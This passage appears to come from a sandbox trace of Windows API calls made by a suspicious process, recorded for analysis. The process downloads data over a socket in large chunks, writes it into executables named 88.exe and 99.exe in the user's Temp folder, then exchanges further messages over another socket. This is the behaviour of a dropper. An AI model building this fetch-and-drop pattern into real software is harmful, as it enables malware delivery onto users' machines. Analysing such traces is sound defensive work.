lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25af054*, lpNumberOfBytesWritten=0x36f24c*=0xfaf0, lpOverlapped=0x0) returned 1 [0230.273] recv (in: s=0x430, buf=0x25af054, len=65536, flags=0 | out: buf=0x25af054*) returned 32120 [0230.276] WriteFile (in: hFile=0x364, lpBuffer=0x25af054*, nNumberOfBytesToWrite=0x7d78, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25af054*, lpNumberOfBytesWritten=0x36f24c*=0x7d78, lpOverlapped=0x0) returned 1 [0230.284] recv (in: s=0x430, buf=0x25af054, len=65536, flags=0 | out: buf=0x25af054*) returned 65536 [0230.285] WriteFile (in: hFile=0x364, lpBuffer=0x25af054*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25af054*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0230.287] recv (in: s=0x430, buf=0x25af054, len=65536, flags=0 | out: buf=0x25af054*) returned 65536 [0230.287] WriteFile (in: hFile=0x364, lpBuffer=0x25af054*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25af054*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0230.289] recv (in: s=0x430, buf=0x25af054, len=65536, flags=0 | out: buf=0x25af054*) returned 65536 [0230.289] WriteFile (in: hFile=0x364, lpBuffer=0x25af054*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25af054*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0230.290] recv (in: s=0x430, buf=0x25af054, len=65536, flags=0 | out: buf=0x25af054*) returned 65536 [0230.291] WriteFile (in: hFile=0x364, lpBuffer=0x25af054*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25af054*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0230.292] recv (in: s=0x430, buf=0x25af054, len=65536, flags=0 | out: buf=0x25af054*) returned 65536 [0230.292] WriteFile (in: hFile=0x364, lpBuffer=0x25af054*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25af054*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0230.301] recv (in: s=0x430, buf=0x25af054, len=65536, flags=0 | out: buf=0x25af054*) returned 65536 [0230.302] WriteFile (in: hFile=0x364, lpBuffer=0x25af054*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25af054*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0230.303] recv (in: s=0x430, buf=0x25af054, len=65536, flags=0 | out: buf=0x25af054*) returned 46244 [0230.303] WriteFile (in: hFile=0x364, lpBuffer=0x25af054*, nNumberOfBytesToWrite=0xb4a4, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25af054*, lpNumberOfBytesWritten=0x36f24c*=0xb4a4, lpOverlapped=0x0) returned 1 [0230.304] recv (in: s=0x430, buf=0x25af054, len=65536, flags=0 | out: buf=0x25af054*) returned 65536 [0230.329] WriteFile (in: hFile=0x364, lpBuffer=0x25af054*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25af054*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0230.333] recv (in: s=0x430, buf=0x25af054, len=65536, flags=0 | out: buf=0x25af054*) returned 65536 [0230.333] WriteFile (in: hFile=0x364, lpBuffer=0x25af054*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25af054*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0230.338] recv (in: s=0x430, buf=0x25af054, len=65536, flags=0 | out: buf=0x25af054*) returned 65536 [0230.338] WriteFile (in: hFile=0x364, lpBuffer=0x25af054*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25af054*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0230.340] recv (in: s=0x430, buf=0x25af054, len=65536, flags=0 | out: buf=0x25af054*) returned 65536 [0230.340] WriteFile (in: hFile=0x364, lpBuffer=0x25af054*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25af054*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0230.341] recv (in: s=0x430, buf=0x25af054, len=65536, flags=0 | out: buf=0x25af054*) returned 65536 [0230.341] WriteFile (in: hFile=0x364, lpBuffer=0x25af054*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25af054*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0230.343] recv (in: s=0x430, buf=0x25af054, len=65536, flags=0 | out: buf=0x25af054*) returned 65536 [0230.343] WriteFile (in: hFile=0x364, lpBuffer=0x25af054*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25af054*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0230.345] recv (in: s=0x430, buf=0x25af054, len=65536, flags=0 | out: buf=0x25af054*) returned 65536 [0230.345] WriteFile (in: hFile=0x364, lpBuffer=0x25af054*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25af054*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0230.347] recv (in: s=0x430, buf=0x25af054, len=65536, flags=0 | out: buf=0x25af054*) returned 65536 [0230.347] WriteFile (in: hFile=0x364, lpBuffer=0x25af054*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25af054*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0230.348] recv (in: s=0x430, buf=0x25af054, len=65536, flags=0 | out: buf=0x25af054*) returned 65536 [0230.348] WriteFile (in: hFile=0x364, lpBuffer=0x25af054*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25af054*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0230.350] recv (in: s=0x430, buf=0x25af054, len=65536, flags=0 | out: buf=0x25af054*) returned 65536 [0230.350] WriteFile (in: hFile=0x364, lpBuffer=0x25af054*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25af054*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0230.352] recv (in: s=0x430, buf=0x25af054, len=65536, flags=0 | out: buf=0x25af054*) returned 65536 [0230.352] WriteFile (in: hFile=0x364, lpBuffer=0x25af054*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25af054*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0230.353] recv (in: s=0x430, buf=0x25af054, len=58928, flags=0 | out: buf=0x25af054*) returned 58928 [0230.354] SetEvent (hEvent=0x250) returned 1 [0230.354] WriteFile (in: hFile=0x364, lpBuffer=0x25af054*, nNumberOfBytesToWrite=0xe630, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25af054*, lpNumberOfBytesWritten=0x36f24c*=0xe630, lpOverlapped=0x0) returned 1 [0230.355] CloseHandle (hObject=0x364) returned 1 [0230.421] ExpandEnvironmentStringsW (in: lpSrc="%tmp%", lpDst=0x36f1cc, nSize=0x64 | out: lpDst="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 0x25 [0230.421] ExpandEnvironmentStringsW (in: lpSrc="%tmp%\\88.exe", lpDst=0x36f1cc, nSize=0x64 | out: lpDst="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe") returned 0x2c [0230.422] GetLongPathNameW (in: lpszShortPath="C:\\Users\\KEECFM~1\\", lpszLongPath=0x36edd8, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\kEecfMwgj\\") returned 0x13 [0230.422] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\88.exe", nBufferLength=0x105, lpBuffer=0x36edec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\88.exe", lpFilePart=0x0) returned 0x2c [0230.422] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", nBufferLength=0x105, lpBuffer=0x36ede0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", lpFilePart=0x0) returned 0x25 [0230.422] ExpandEnvironmentStringsW (in: lpSrc="%tmp%", lpDst=0x36f1cc, nSize=0x64 | out: lpDst="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 0x25 [0230.423] ExpandEnvironmentStringsW (in: lpSrc="%tmp%\\88.exe", lpDst=0x36f1cc, nSize=0x64 | out: lpDst="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe") returned 0x2c [0230.425] LocalAlloc (uFlags=0x0, uBytes=0x58) returned 0x5e87d50 [0230.461] LocalAlloc (uFlags=0x0, uBytes=0x4c) returned 0x5ee1fb0 [0252.895] LocalFree (hMem=0x5e87d50) returned 0x0 [0252.896] LocalFree (hMem=0x5ee1fb0) returned 0x0 [0252.898] ExpandEnvironmentStringsW (in: lpSrc="%tmp%", lpDst=0x36f1cc, nSize=0x64 | out: lpDst="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 0x25 [0252.898] ExpandEnvironmentStringsW (in: lpSrc="%tmp%\\99.exe", lpDst=0x36f1cc, nSize=0x64 | out: lpDst="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\99.exe") returned 0x2c [0252.900] GetLongPathNameW (in: lpszShortPath="C:\\Users\\KEECFM~1\\", lpszLongPath=0x36ecdc, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\kEecfMwgj\\") returned 0x13 [0252.901] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\99.exe", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\99.exe", lpFilePart=0x0) returned 0x2c [0252.901] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f208) returned 1 [0252.901] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\99.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\99.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x450 [0252.904] GetFileType (hFile=0x450) returned 0x1 [0252.904] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f204) returned 1 [0252.904] GetFileType (hFile=0x450) returned 0x1 [0252.905] QueryPerformanceCounter (in: lpPerformanceCount=0x36f288 | out: lpPerformanceCount=0x36f288*=3097788251167) returned 1 [0252.906] SetEvent (hEvent=0x250) returned 1 [0254.104] select (in: nfds=0, readfds=0x25c1f5c, writefds=0x0, exceptfds=0x0, timeout=0x36f13c*(tv_sec=0, tv_usec=0) | out: readfds=0x25c1f5c, writefds=0x0, exceptfds=0x0) returned 0 [0254.105] send (s=0x430, buf=0x25acd60*, len=48, flags=0) returned 48 [0254.107] setsockopt (s=0x430, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0 [0254.107] recv (in: s=0x430, buf=0x25a8b20, len=4096, flags=0 | out: buf=0x25a8b20*) returned 4096 [0254.328] setsockopt (s=0x430, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0 [0254.328] recv (in: s=0x430, buf=0x25c283c, len=65536, flags=0 | out: buf=0x25c283c*) returned 26564 [0254.329] WriteFile (in: hFile=0x450, lpBuffer=0x25d2854*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25d2854*, lpNumberOfBytesWritten=0x36f24c*=0x1000, lpOverlapped=0x0) returned 1 [0254.331] WriteFile (in: hFile=0x450, lpBuffer=0x25c2984*, nNumberOfBytesToWrite=0x667c, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25c2984*, lpNumberOfBytesWritten=0x36f24c*=0x667c, lpOverlapped=0x0) returned 1 [0254.331] recv (in: s=0x430, buf=0x25c283c, len=65536, flags=0 | out: buf=0x25c283c*) returned 65536 [0254.733] WriteFile (in: hFile=0x450, lpBuffer=0x25c283c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25c283c*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0254.735] recv (in: s=0x430, buf=0x25c283c, len=65536, flags=0 | out: buf=0x25c283c*) returned 65536 [0254.735] WriteFile (in: hFile=0x450, lpBuffer=0x25c283c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25c283c*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0254.737] recv (in: s=0x430, buf=0x25c283c, len=65536, flags=0 | out: buf=0x25c283c*) returned 6168 [0254.737] WriteFile (in: hFile=0x450, lpBuffer=0x25c283c*, nNumberOfBytesToWrite=0x1818, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25c283c*, lpNumberOfBytesWritten=0x36f24c*=0x1818, lpOverlapped=0x0) returned 1 [0254.737] recv (in: s=0x430, buf=0x25c283c, len=65536, flags=0 | out: buf=0x25c283c*) returned 65536 [0254.784] WriteFile (in: hFile=0x450, lpBuffer=0x25c283c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25c283c*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0254.787] recv (in: s=0x430, buf=0x25c283c, len=65536, flags=0 | out: buf=0x25c283c*) returned 65536 [0254.787] WriteFile (in: hFile=0x450, lpBuffer=0x25c283c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25c283c*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0254.789] recv (in: s=0x430, buf=0x25c283c, len=65536, flags=0 | out: buf=0x25c283c*) returned 51428 [0254.789] WriteFile (in: hFile=0x450, lpBuffer=0x25c283c*, nNumberOfBytesToWrite=0xc8e4, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25c283c*, lpNumberOfBytesWritten=0x36f24c*=0xc8e4, lpOverlapped=0x0) returned 1 [0254.791] recv (in: s=0x430, buf=0x25c283c, len=65536, flags=0 | out: buf=0x25c283c*) returned 65536 [0254.866] WriteFile (in: hFile=0x450, lpBuffer=0x25c283c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25c283c*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0254.868] recv (in: s=0x430, buf=0x25c283c, len=65536, flags=0 | out: buf=0x25c283c*) returned 65536 [0254.868] WriteFile (in: hFile=0x450, lpBuffer=0x25c283c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25c283c*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0254.870] recv (in: s=0x430, buf=0x25c283c, len=65536, flags=0 | out: buf=0x25c283c*) returned 65536 [0254.870] WriteFile (in: hFile=0x450, lpBuffer=0x25c283c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25c283c*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0254.873] recv (in: s=0x430, buf=0x25c283c, len=65536, flags=0 | out: buf=0x25c283c*) returned 65536 [0254.873] WriteFile (in: hFile=0x450, lpBuffer=0x25c283c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25c283c*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0254.874] recv (in: s=0x430, buf=0x25c283c, len=65536, flags=0 | out: buf=0x25c283c*) returned 65536 [0254.874] WriteFile (in: hFile=0x450, lpBuffer=0x25c283c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25c283c*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0254.876] recv (in: s=0x430, buf=0x25c283c, len=65536, flags=0 | out: buf=0x25c283c*) returned 34400 [0254.876] WriteFile (in: hFile=0x450, lpBuffer=0x25c283c*, nNumberOfBytesToWrite=0x8660, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25c283c*, lpNumberOfBytesWritten=0x36f24c*=0x8660, lpOverlapped=0x0) returned 1 [0254.877] recv (in: s=0x430, buf=0x25c283c, len=65536, flags=0 | out: buf=0x25c283c*) returned 65536 [0254.926] WriteFile (in: hFile=0x450, lpBuffer=0x25c283c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25c283c*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0254.929] recv (in: s=0x430, buf=0x25c283c, len=65536, flags=0 | out: buf=0x25c283c*) returned 65536 [0254.930] WriteFile (in: hFile=0x450, lpBuffer=0x25c283c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25c283c*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0254.932] recv (in: s=0x430, buf=0x25c283c, len=65536, flags=0 | out: buf=0x25c283c*) returned 65536 [0254.932] WriteFile (in: hFile=0x450, lpBuffer=0x25c283c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25c283c*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0254.933] recv (in: s=0x430, buf=0x25c283c, len=65536, flags=0 | out: buf=0x25c283c*) returned 65536 [0254.933] WriteFile (in: hFile=0x450, lpBuffer=0x25c283c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25c283c*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0254.934] recv (in: s=0x430, buf=0x25c283c, len=65536, flags=0 | out: buf=0x25c283c*) returned 65536 [0254.934] WriteFile (in: hFile=0x450, lpBuffer=0x25c283c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25c283c*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0254.935] recv (in: s=0x430, buf=0x25c283c, len=65536, flags=0 | out: buf=0x25c283c*) returned 65536 [0254.935] WriteFile (in: hFile=0x450, lpBuffer=0x25c283c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25c283c*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0254.941] recv (in: s=0x430, buf=0x25c283c, len=65536, flags=0 | out: buf=0x25c283c*) returned 65536 [0254.941] WriteFile (in: hFile=0x450, lpBuffer=0x25c283c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25c283c*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0254.942] recv (in: s=0x430, buf=0x25c283c, len=65536, flags=0 | out: buf=0x25c283c*) returned 65536 [0254.942] WriteFile (in: hFile=0x450, lpBuffer=0x25c283c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25c283c*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0254.944] recv (in: s=0x430, buf=0x25c283c, len=65536, flags=0 | out: buf=0x25c283c*) returned 65536 [0254.944] WriteFile (in: hFile=0x450, lpBuffer=0x25c283c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25c283c*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0254.945] recv (in: s=0x430, buf=0x25c283c, len=65536, flags=0 | out: buf=0x25c283c*) returned 65536 [0254.945] WriteFile (in: hFile=0x450, lpBuffer=0x25c283c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25c283c*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0254.947] recv (in: s=0x430, buf=0x25c283c, len=65536, flags=0 | out: buf=0x25c283c*) returned 65536 [0254.947] WriteFile (in: hFile=0x450, lpBuffer=0x25c283c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25c283c*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0254.951] recv (in: s=0x430, buf=0x25c283c, len=65536, flags=0 | out: buf=0x25c283c*) returned 6184 [0254.951] WriteFile (in: hFile=0x450, lpBuffer=0x25c283c*, nNumberOfBytesToWrite=0x1828, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25c283c*, lpNumberOfBytesWritten=0x36f24c*=0x1828, lpOverlapped=0x0) returned 1 [0254.952] recv (in: s=0x430, buf=0x25c283c, len=65536, flags=0 | out: buf=0x25c283c*) returned 65536 [0254.965] WriteFile (in: hFile=0x450, lpBuffer=0x25c283c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25c283c*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0254.976] recv (in: s=0x430, buf=0x25c283c, len=65536, flags=0 | out: buf=0x25c283c*) returned 65536 [0254.976] WriteFile (in: hFile=0x450, lpBuffer=0x25c283c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25c283c*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0254.978] recv (in: s=0x430, buf=0x25c283c, len=65536, flags=0 | out: buf=0x25c283c*) returned 65536 [0254.978] WriteFile (in: hFile=0x450, lpBuffer=0x25c283c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25c283c*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0254.980] recv (in: s=0x430, buf=0x25c283c, len=65536, flags=0 | out: buf=0x25c283c*) returned 65536 [0254.980] WriteFile (in: hFile=0x450, lpBuffer=0x25c283c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25c283c*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0254.982] recv (in: s=0x430, buf=0x25c283c, len=65536, flags=0 | out: buf=0x25c283c*) returned 65536 [0254.982] WriteFile (in: hFile=0x450, lpBuffer=0x25c283c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25c283c*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0254.983] recv (in: s=0x430, buf=0x25c283c, len=36352, flags=0 | out: buf=0x25c283c*) returned 36352 [0254.984] SetEvent (hEvent=0x250) returned 1 [0254.984] WriteFile (in: hFile=0x450, lpBuffer=0x25c283c*, nNumberOfBytesToWrite=0x8e00, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25c283c*, lpNumberOfBytesWritten=0x36f24c*=0x8e00, lpOverlapped=0x0) returned 1 [0254.985] CloseHandle (hObject=0x450) returned 1 [0255.009] ExpandEnvironmentStringsW (in: lpSrc="%tmp%", lpDst=0x36f1cc, nSize=0x64 | out: lpDst="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 0x25 [0255.009] ExpandEnvironmentStringsW (in: lpSrc="%tmp%\\99.exe", lpDst=0x36f1cc, nSize=0x64 | out: lpDst="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\99.exe") returned 0x2c [0255.009] GetLongPathNameW (in: lpszShortPath="C:\\Users\\KEECFM~1\\", lpszLongPath=0x36edd8, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\kEecfMwgj\\") returned 0x13 [0255.010] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\99.exe", nBufferLength=0x105, lpBuffer=0x36edec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\99.exe", lpFilePart=0x0) returned 0x2c [0255.010] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", nBufferLength=0x105, lpBuffer=0x36ede0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", lpFilePart=0x0) returned 0x25 [0255.010] ExpandEnvironmentStringsW (in: lpSrc="%tmp%", lpDst=0x36f1cc, nSize=0x64 | out: lpDst="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 0x25 [0255.010] ExpandEnvironmentStringsW (in: lpSrc="%tmp%\\99.exe", lpDst=0x36f1cc, nSize=0x64 | out: lpDst="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\99.exe") returned 0x2c [0255.010] LocalAlloc (uFlags=0x0, uBytes=0x58) returned 0x5e87d50 [0255.010] LocalAlloc (uFlags=0x0, uBytes=0x4c) returned 0x5ee1fb0 [0257.752] LocalFree (hMem=0x5e87d50) returned 0x0 [0257.752] LocalFree (hMem=0x5ee1fb0) returned 0x0 [0257.764] CoCreateGuid (in: pguid=0x36efd0 | out: pguid=0x36efd0*(Data1=0xaef18ddb, Data2=0x162, Data3=0x4bfa, Data4=([0]=0xb0, [1]=0xd, [2]=0x4b, [3]=0x13, [4]=0x87, [5]=0x58, [6]=0x65, [7]=0xee))) returned 0x0 [0257.764] CoCreateGuid (in: pguid=0x36ef14 | out: pguid=0x36ef14*(Data1=0x9d34f8ff, Data2=0x371d, Data3=0x4f89, Data4=([0]=0xa2, [1]=0x3c, [2]=0x25, [3]=0x6, [4]=0x72, [5]=0x1e, [6]=0x5e, [7]=0xa0))) returned 0x0 [0257.769] send (s=0x264, buf=0x24230db*, len=580, flags=0) returned 580 [0257.770] recv (in: s=0x264, buf=0x23b4890, len=8192, flags=0 | out: buf=0x23b4890*) returned 112 [0257.806] CoCreateGuid (in: pguid=0x36efd0 | out: pguid=0x36efd0*(Data1=0x65d96c93, Data2=0x9f34, Data3=0x4594, Data4=([0]=0xb4, [1]=0x9c, [2]=0x85, [3]=0x4, [4]=0x7f, [5]=0xf2, [6]=0x53, [7]=0x52))) returned 0x0 [0257.806] CoCreateGuid (in: pguid=0x36ef14 | out: pguid=0x36ef14*(Data1=0x8eb87f38, Data2=0xf35f, Data3=0x4b1c, Data4=([0]=0xa6, [1]=0xf2, [2]=0x9e, [3]=0xac, [4]=0x53, [5]=0x92, [6]=0xf1, [7]=0xe9))) returned 0x0 [0257.806] send (s=0x264, buf=0x24230db*, len=536, flags=0) returned 536 [0257.807] recv (in: s=0x264, buf=0x23b4890, len=8192, flags=0 | out: buf=0x23b4890*) returned 60 [0257.843] CoGetContextToken (in: pToken=0x36fd88 | out: pToken=0x36fd88) returned 0x0 [0257.843] IUnknown:QueryInterface (in: 